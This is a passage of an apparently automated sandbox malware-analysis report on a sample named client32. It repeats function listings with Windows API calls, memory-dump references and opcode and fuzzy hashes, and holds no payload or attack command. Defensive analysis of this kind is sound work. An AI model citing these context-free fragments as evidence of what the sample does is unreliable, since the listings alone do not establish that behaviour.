                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Bitmap_free_malloc
                                                                              • String ID:
                                                                              • API String ID: 4288422576-0
                                                                              • Opcode ID: 91c89b74b91c336bb3830d7201085ffe0f6e2ebe70c7ebf5e74ffc9f1e31602d
                                                                              • Instruction ID: 71ddcf67a8684a935c6e16c4ea2a73cd506f955dbb6c56238cfab8e0aaa932bb
                                                                              • Opcode Fuzzy Hash: 91c89b74b91c336bb3830d7201085ffe0f6e2ebe70c7ebf5e74ffc9f1e31602d
                                                                              • Instruction Fuzzy Hash: 8421FF79610A019FD364DF28C994AE7B3E9FBC8318F10891DE56A97311CB31F842CB50
                                                                              Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetBkColor.GDI32(?,?), ref: 11143091
                                                                              • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                              • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                              • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Color$RectText
                                                                              • String ID:
                                                                              • API String ID: 4034337308-0
                                                                              • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                              • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                              • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                              • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                              Function 111103D0 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                              • EnterCriticalSection.KERNEL32(00000000,75BF3760,00000000,111F1590,?,110CD955,00000000,75BF3760), ref: 111103E8
                                                                              • LeaveCriticalSection.KERNEL32(00000000,75C0A1D0,00000000,?,110CD955,00000000,75BF3760), ref: 11110408
                                                                              • LeaveCriticalSection.KERNEL32(00000000,75C0A1D0,00000000,?,110CD955,00000000,75BF3760), ref: 1111041C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                              • String ID:
                                                                              • API String ID: 2905768538-0
                                                                              • Opcode ID: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
                                                                              • Instruction ID: 4c724308613bea48e6bb16f63c046e4f2304003fe7903f8ffd3459ebd8414c8e
                                                                              • Opcode Fuzzy Hash: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
                                                                              • Instruction Fuzzy Hash: 73F0623665112CEFD305DFA5D9849AEB7A8FB99316B10417AF925C7900E630A905CBF0
                                                                              Function 111262F0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 11126318
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 1112631F
                                                                              • GetSystemMetrics.USER32(00000000), ref: 1112633C
                                                                              • GetSystemMetrics.USER32(00000001), ref: 11126349
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              • Opcode ID: 3b4a1dd1ca9e47f377dd888b19c7a62076a78745d4869df6f922d4effe3b737a
                                                                              • Instruction ID: 028166286d3bd400be092ba0325ce689d6481c0f69bbb526fc7211a1c27e1f06
                                                                              • Opcode Fuzzy Hash: 3b4a1dd1ca9e47f377dd888b19c7a62076a78745d4869df6f922d4effe3b737a
                                                                              • Instruction Fuzzy Hash: 6C013C716057159FE320EFA9C944B16F7E8EF44B10F21882ED65EC7A90D7B4A480CB90
                                                                              Function 111383C0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,00000000,75BF3760,110F7D8C,?,00000104), ref: 111383C8
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 111383D6
                                                                                • Part of subcall function 11113160: FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                                • Part of subcall function 11113160: SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                              • DeleteObject.GDI32(00000000), ref: 1113840A
                                                                              • DeleteObject.GDI32(?), ref: 11138414
                                                                                • Part of subcall function 11095920: _memset.LIBCMT ref: 1109594F
                                                                                • Part of subcall function 11095920: FreeLibrary.KERNEL32(00000000,?,75C04920,11119E07,00000002), ref: 1109595A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Delete$ObjectWindow$AtomDestroyFindFreeGlobalLibraryMessageSend_memset
                                                                              • String ID:
                                                                              • API String ID: 370783926-0
                                                                              • Opcode ID: 58e957487a8832166c480bc813a73a45169cf8ddeb5aee4571b3bc3ff4d557d5
                                                                              • Instruction ID: 799c2b35d490dd5e626eaccd758f186befe5f7b991eaf06d61b0359e6872da7a
                                                                              • Opcode Fuzzy Hash: 58e957487a8832166c480bc813a73a45169cf8ddeb5aee4571b3bc3ff4d557d5
                                                                              • Instruction Fuzzy Hash: 8AF02776A0062457D314AB69AD44B2FF3A8EFC5B29B05403CE965A3608DB25F801C7A1
                                                                              Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomDeleteGlobal$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 964255742-0
                                                                              • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                              • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                              • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                              • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                              Function 110820F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11081C50: IsDBCSLeadByte.KERNEL32(00000000,?,00000000,11081E2A,?,0000005C), ref: 11081C6C
                                                                              • CompareStringA.KERNEL32(00000400,00000000,?,0000000C,?,?,?,?,?,0000000C,?,?,?,?,?,?), ref: 110822FB
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • _strncmp.LIBCMT ref: 1108232F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCompareLeadString__isdigit_l_strncmp
                                                                              • String ID: {-.
                                                                              • API String ID: 3286074029-1528367491
                                                                              • Opcode ID: 4d8afa05ddccc26e401f41977dd92a764ff12fedfb38d6d86dda50b79b2d366f
                                                                              • Instruction ID: 42614cb2d1b9d3b778ecc90c9d3306305cb73528e675c69c4a583d3e5576a220
                                                                              • Opcode Fuzzy Hash: 4d8afa05ddccc26e401f41977dd92a764ff12fedfb38d6d86dda50b79b2d366f
                                                                              • Instruction Fuzzy Hash: 227179A4D0C2D76AEB02CEB44C5036EBFDD8F95208F1881FAECD887241E672D655D3A1
                                                                              Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                              • SetFocus.USER32(?), ref: 11007403
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                              • String ID: edit
                                                                              • API String ID: 1305092643-2167791130
                                                                              • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                              • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                              • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                              • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                              Function 11040320 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                              • GetRegionData.GDI32(?,00001000,?), ref: 11040385
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                              • API String ID: 1231476184-2270926670
                                                                              • Opcode ID: fa938692faa72bfd7a152b515735bbb774d24fd1cc934a4ad490e94894950335
                                                                              • Instruction ID: fcc014cb92af89be413bccaeb8ed5c1d1208fe51c9cebf699e971ae9d8c69b9a
                                                                              • Opcode Fuzzy Hash: fa938692faa72bfd7a152b515735bbb774d24fd1cc934a4ad490e94894950335
                                                                              • Instruction Fuzzy Hash: E8611BB5E001AA9FCB24CF54CC94AD9B3B5FF88344F1042D9E689A7248DAB46E85CF50
                                                                              Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                              • _memmove.LIBCMT ref: 11009336
                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                              • String ID: string too long
                                                                              • API String ID: 2168136238-2556327735
                                                                              • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                              • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                              • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                              • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                              Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argument_memmovestd::_
                                                                              • String ID: string too long
                                                                              • API String ID: 256744135-2556327735
